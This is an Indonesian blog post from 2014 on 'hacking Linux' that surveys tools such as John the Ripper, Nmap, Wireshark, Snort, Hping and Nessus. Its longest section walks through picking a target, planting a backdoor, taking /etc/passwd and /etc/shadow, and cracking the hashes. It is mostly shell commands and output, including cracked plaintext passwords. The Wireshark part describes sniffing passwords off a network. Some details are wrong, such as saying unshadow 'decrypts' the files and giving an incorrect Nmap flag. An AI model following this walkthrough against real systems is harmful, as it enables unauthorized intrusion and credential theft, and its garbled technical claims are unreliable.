Kamis, 18 Desember 2014

Hacking Sistem Operasi Linux

                              
                    Linux sesungguhnya sebuah produk hacking,sebab pada awalnya Linux Torvalds hanya mengoprek dari sistem operasi atau Kernel pada saat belajar bahasa pemograman bahasa C dan mempelajari buku Operating Systems: Design and Implementation karya Andrew S Tanenbaum.Dalam buku itu disertakan MINIX2, hingga kemudian menjadi oprekan bagi para hacker dunia.

A. Tool Hacking Linux

Berikut ini adalah software-software yang paling sering digunakan untuk melakukan hacking terhadap Kernel Linux, yaitu:

1. John the Ripper
    

John the Ripper merupakan sebuah program cracking password yang awalnya dikembangkan untuk sistem operasi UNIX. Tool ini merupakan password testing dan breaking program yang populer karena menggabungkan sejumlah kombinasi password kedalam satu paket dan mempunyai sistem Autodetects Hash Type dan Customizable Cracker.
  • Cara memakai John the Ripper
Pertama-tama carilah sebuah target yang kalian suka lalu terserah cara kalian untuk memasang backdoor.
Carilah file “passwd” dan “shadow”,biasanya letak passwd dan shadow ada di /etc/passwd dan /etc/shadow lalu terserah kalian mau diupload atau dikerjakan dalam shell file “passwd” dan “shadow” untuk dicrack.
sekarang go to the point :
[root@D-and~ tmp]# wget
[root@D-and~ tmp]# ls
radsess.13217 radsess.15352 radsess.26504
.. radsess.13221 radsess.15377 radsess.26508
.bash_history radsess.13252 radsess.15505 radsess.26516
.bash_logout radsess.13257 radsess.15509 radsess.26520
.bash_profile radsess.13261 radsess.15510 radsess.29908
.bashrc radsess.13262 radsess.15517 radsess.29909
.emacs radsess.13269 radsess.15521 radsess.29935
.gtkrc radsess.13273 radsess.15525 radsess.29940
.kde radsess.13277 radsess.15627 radsess.29946
.screenrc radsess.13278 radsess.15631 radsess.30573
.webmin radsess.13287 radsess.15632 radsess.30577
john-1.72.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585
[root@D-and~ tmp]# tar -zxvf john-1.72.tar.gz
john-1.72/src/AFS_fmt.c
john-1.72/src/BF_fmt.c
john-1.72/src/BF_std.c
john-1.72/src/BSDI_fmt.c
john-1.72/src/DES_bs.c



john-1.72/doc/OPTIONS
john-1.72/doc/README
john-1.72/doc/RULES
john-1.72/README
udah selesai dicompile kita cek, folder paman john kita yang tercinta
[root@D-and~ tmp]# ls
[root@D-and~ tmp]# ls
radsess.13213 radsess.15348 radsess.26500
.. radsess.13217 radsess.15352 radsess.26504
.bash_history radsess.13221 radsess.15377 radsess.26508
.bash_logout radsess.13252 radsess.15505 radsess.26516
.bash_profile radsess.13257 radsess.15509 radsess.26520
.bashrc radsess.13261 radsess.15510 radsess.29908
.emacs radsess.13262 radsess.15517 radsess.29909
.gtkrc radsess.13269 radsess.15521 radsess.29935
.kde radsess.13273 radsess.15525 radsess.29940
.screenrc radsess.13277 radsess.15627 radsess.29946
.webmin radsess.13278 radsess.15631 radsess.30573
john-1.72 radsess.13287 radsess.15632 radsess.30577
john-1.72.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585
[root@D-and~ tmp]# cd john-1.72
[root@D-and~ john-1.72]
setelah kita masuk…kita langsung cari folder src
[root@D-and~ john-1.72]# ls
. .. README doc run src
[root@D-and~ john-1.72]# cd src
[root@D-and~ src]# ls
. alpha.h formats.h mips32.h single.c
.. batch.c getopt.c mips64.h single.h
AFS_fmt.c batch.h getopt.h misc.c sparc.S
………
………
Makefile detect.c math.c rules.c x86-mmx.h
Makefile.dep external.c math.h rules.h x86.S
alpha-4k.h external.h memory.c signals.c
alpha.S formats.c memory.h signals.h
kita compile dulu, dan liat jenis mesin yang ada
[root@D-and~ src]# make
To build John the Ripper, type:
make SYSTEM
where SYSTEM can be one of the following:
linux-x86-any-elf Linux, x86, ELF binaries
linux-x86-mmx-elf Linux, x86 with MMX, ELF binaries
….
….
win32-cygwin-x86-mmx Win32, Cygwin, x86 with MMX
win32-cygwin-x86-k6 Win32, Cygwin, AMD K6
generic Any other UNIX system with gcc
[root@D-and~ src]# make generic
[root@D-and~ src]# rm -f arch.h
[root@D-and~ src]# gcc -c -Wall -O2 -fomit-frame-pointer detect.c
[root@D-and~ src]# gcc -s detect.o -o detect
[root@D-and~ src]# ./best.sh “make” “DES_fmt.o DES_std.o” “MD5_std.o” “BF_std.o”
Compiling: DES benchmark (code version #1)
make[1]: Entering directory `/tmp/john-1.72/src’
[root@D-and~ src]# gcc -c -Wall -O2 -fomit-frame-pointer -funroll-loops DES_bs.c
[root@D-and~ src]# sed “s/unsigned long/ARCH_WORD/” nonstd.c > DES_bs_s.c


sampai muncul kata /run/unshadow
sampai muncul kata /run/unique
sampai muncul kata /run/unafs
Sehabis itu kita menuju ke folder run di direktory john.
[root@D-and~ src]# cd ..
[root@D-and~ john-1.72]# cd run
[root@D-and~ run]# ls
digits.chr lanman.chr unshadow
.. john mailer unafs
alpha.chr john.pot passwd.1st unique
kaya gitu lah kira2 munculnya )
setelah itu kita cari letak passwd dan shadow
[root@D-and~ run]# whereis passwd
passwd: /usr/bin/passwd /etc/passwd /etc/passwd.OLD
/usr/share/man/man1/passwd.1.gz
/usr/share/man/man5/passwd.5.gz
Hmm.. ada tuh /etc/passwd,
kemudian gunakan cara yang sama untuk mencari file shadow ~ penulis telah mencoba beberapa shell dan memang letak passwd dan shadow di /etc/passwd dan /etc/shadow. File passwd emang bisa diread oleh siapa saja, sedang file shadow tidak bisa..diperlukan access root untuk mengambil 2 data tersebut, sebab file passwd dan shadow telah diencrypt.
Nah sekang kita masuk ke tahap untuk mendecrypt password, alias “CRACK PASSWORD”
[root@D-and~ run]# ./unshadow /etc/passwd /etc/shadow > passwd.1
maksudnya file passwd dan shadow di decrypt menjadi 1 file bernama passwd.1
[root@D-and~ run]# cat passwd.1
root:$1$??A5?wMG$MtD3gClDSs2//g6b.Ri/a/:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin/nologin
daemon:*:2:2:daemon:/sbin:/sbin/nologin
adm:*:3:4:adm:/var/adm:/sbin/nologin
lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
….
johnl:$1$fWkgxJYA$7DP..k060XiXpfLlQThFd/:504:500::/home/johnl:/bin/bash
chrisl:$1$AaSlFOUP$yoCJ2ZvqvDjwxLl0SkTAQ.:505:500::/home/chrisl:/bin/bash
turner:$1$p.lFHE.e$12uUTK3WMSRa.4Hgm15Ti/:506:506::/home/turner:/bin/bash
williams:$1$0egmDfIs$Bqes1nBH9vYBf6yXAUKFQ0:507:500::/home/williams:/bin/bash
Setelah itu kita jalankan berbagai macam perintah Paman John contohnya :
Keterangan meng-Crack Password yang sudah di decrypt :
1. menggunakan -i:alpha
[root@D-and~ run]# ./john -i:alpha passwd.1 &
maksudnya kita crack passwd.1 dan disimpan dibackground, jadi tinggalin aja selama paman john mengcrack password untuk kita, kita bisa ngeroot ntar dia muncul kaya gini kalo berhasil
[root@D-and~ run]# ./john -i:alpha passwd.1 &
Loaded 2 passwords with 2 different salts (Standard DES [24/32 128K])
watson (root)
johnl (summer)
2. menggunakan -single <== kita menggunakan paman john secara powerfull emang agak lambat tapi dia secara teliti mengecek passwordnya )
[root@D-and~ run]# /john -single passwd.2
3. kita ingin mengecrack password root / user saja
[root@D-and~ run]# ./john -i:alpha -user:0 passwd.1
atau
[root@D-and~ run]# ./john -i:alpha -user:500 passwd.1
untuk mengecek hasil password yang kita crack, dapat menggunakan
[root@D-and~ run]# ./john -show passwd.1
[root@D-and~ run]# ./john -show passwd.3
root:watson:0:0:root:/root:/bin/bash
coda:tools:500:500:CODA Manager:/home/coda:/bin/bash
adam:myrtle:501:500::/home/adam:/bin/bash
herschel:chester:502:500::/home/herschel:/bin/bash
johnl:summer:504:500::/home/johnl:/bin/bash
chrisl:turtle:505:500::/home/chrisl:/bin/bash
turner:account:506:506::/home/turner:/bin/bash
williams:ronald:507:500::/home/williams:/bin/bash
8 passwords cracked, 1 left
artinya user root memiliki password watson
user coda memiliki password tools
user adam memiliki password myrtle

2. NMap






















Nmap merupakan sebuah tool scanner port jaringan komputer. Hacking menggunakan Nmap akan menampilkan port-port sistem komputer yang dianggap Open dan Filtered.
Terdapat 3 macam serangan yang digunakan dalam hacking NMap, yaitu:
  • Syn Scan adalah tipe serangan akan menampilkan hasil serangan lebih cepat, kelemahannya hasil yang ditampilkan tidak spesifik.
  • Fin Scan metode serangan yang akurat dibanding Syn Scan. Fin Scan menampilkan jenis paket terfilter dan kelemahan pada firewall.
  • Ack Scan adalah port yang terfitler dan tidak akan ditampilkan. Tipe serangan ini adalah tipe yang paling spesifik  dan menampilkan hasil yang sangat akurat namun sedikit rumit.
Selain itu,masih ada beberapa teknik-teknik scan pada NMap,yaitu :
  • Mengecek Operating system dengan Nmap
          Code : nmap -0 127.0.0.1
  • Ping Scan digunakan untuk mengirimkan icmp echo request ke target.
          Code : nmap -sP 127.0.0.1
  • UDP Scan digunakan untuk scanning port udp di target.
          Code : nmap -sU 127.0.0.1



3. TCP Dump
TCP Dump adalah tool Linux digunakan untuk memantau aktifitas paket data yang terkirim pada jaringan komputer. Hal ini memungkinkan user untuk mencegat dan menampilkan TCP/IP,serta paket lainnya yang dikirim atau diterima melalui jaringan komputer yang terpasang.






4. Snort

Snort salah satu software yang digunakan untuk memproteksi network dari serangan hacker.Kemampuan Snort adalah mampu mendeteksi instrusi pada sistem, mampu menganalisa real time traffic dan logging ip, mampu menganalisa port dan mendeteksi segala macam serangan dari luar,seperti: buffer overflows,stealth port scans,CGI attacks,SMB probes, dan OS fingerprinting.





5. Wireshark

Wireshark/Ethereal adalah tool untuk menganalisa protoko jaringan.Fungsinya sebagai sniffer dan memantau lalu lintas internet.Wireshark dapat berjalan pada Windows,MAC OS X, dan Linux.Contoh apabila ingin menangkap paket wireless, Anda harus menggunakan Operating system Linux agar wireless card anda dapat di set untuk menangkap semua paket yanng sedang beredar dan didengar oleh wireless card.

  • Cara Menggunakan WireShark, yaitu:
- Jalankan program Wireshark
- Pastikan bahwa isi pada Interface-nya adalah Ethernet Card anda yang menuju ke jaringan,bila bukan gantilah dan pastikan pula bahwa Capture Packets in Promiscuous Mode ON.
-Klik tombol Start,lalu klik tombol Stop setelah Anda merasa yakin bahwa ada password yang masuk selama menekan tombol Start.
- Bisa dilihat semua jenis packet yang masuk dan keluar di jaringan.
- Untuk menganlisis datanya,klik kanan pada data yang ingin di analisis,lalu klik Follow TCP Stream.

6. Hping












Hping merupakan tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall,mencari port yang terbuka,menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi,dan mengevaluasi protokol TCP/IP.

7. Nessus













Nessus adalah program yang berfungsi sebagai security scanner yang akan mengaudit jaringan yang dituju dan menentukan kelemahan-kelemahan dari jaringan yang dituju.
Fitur yang dimiliki Nessus diantaranya :
  • Plug-in Architecture
Dengan fitur ini dapat dengan mudah menambah tes yang diinginkan tanpa harus membaca kode dari Nessus Engine.
  • NASL (Nessus Attack Scripting Languange)
NASL adalah bahasa yang didesain untuk menulis program security tes dengan mudah dan cepat

  • Client-sever Architecture
Nessus security scanner terdiri dari dua bagian, yaitu : server yang berfungsi sebagai pelaku serangan dan sebuah client yang berfungsi sebagai frontend. 
  • Smart Service Recognation 
Nessus tidak mempercayai host yang dituju menggunakan port standar yang ditentukan oleh IANA. Nessus dapat mengenali sebuah web server yang berjalan pada port yang bukan merupakan port standar.

  • Multiple Services
Bila ada dua buah web server pada host yang dituju maka Nessus akan mengetes kedua web server tersebut.
  • Complete Reports
Nessus tidak hanya memberi tahu kelemahan dari jaringan yang dituju,tetapi juga memberikan cara yang dapat digunakan untuk mencegah the bad guy mengeksploitasi kelemahan dari jaringan dan juga memberikan level resiko dari setiap masalah yang ditemukan.
  • Exportable Reports
Unix Client dapat mengekspor laporan sebagai Ascii text,HTML,LaTeX,dan lain-lainnya.